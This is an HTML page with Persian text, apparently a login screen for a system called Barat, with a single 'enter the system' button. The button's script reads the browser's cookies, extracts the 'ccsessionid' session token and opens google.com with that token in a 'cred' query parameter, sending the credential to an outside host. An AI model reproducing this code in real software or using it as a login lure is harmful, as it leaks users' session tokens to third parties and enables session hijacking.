<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>ورود به سامانه برات</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        html, body {
            /*background-image: url("./bg-form.png");*/
            font-family: B Yekan, 'B Yekan', 'BYekan', 'B-Yekan', Tahoma;
            width: 100%;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container {
            display: flex;
            flex-direction: column;
            gap: 65px;
            justify-content: center;
            align-items: center;
            width: 40%;
            height: fit-content;
            padding: 55px;
            border-radius: 6px;
            background-color: white;
            /*border: 1px solid black;*/
            margin-left: auto;
            margin-right: auto;
        }

        .text {
            font-size: 36px;
            font-weight: bolder;
        }

        .btn {
            padding: 12px;
            font-size: 22px;
            background-color: cornflowerblue;
            color: white;
            outline: none;
            border: 0;
            border-radius: 6px;
            margin: auto;
            cursor: pointer;
        }
    </style>
</head>
<body>
<div class="container">
    <p class="text">برای ورود به سامانه کلیک کنید</p>
    <button class="btn" onclick="clicks()">ورود به سامانه</button>
</div>
<script>
    function clicks() {
        const cookies = document.cookie;
        const cookieArray = cookies.split(";");
        const cookieObject = {};
        cookieArray.forEach((cookie) => {
            const [name, value] = cookie.trim().split("=");
            cookieObject[name] = value;
        });

        const cookie = cookieObject["ccsessionid"]
        window.open(`https://www.google.com?cred=${cookie}`)
    }
</script>
</body>
</html>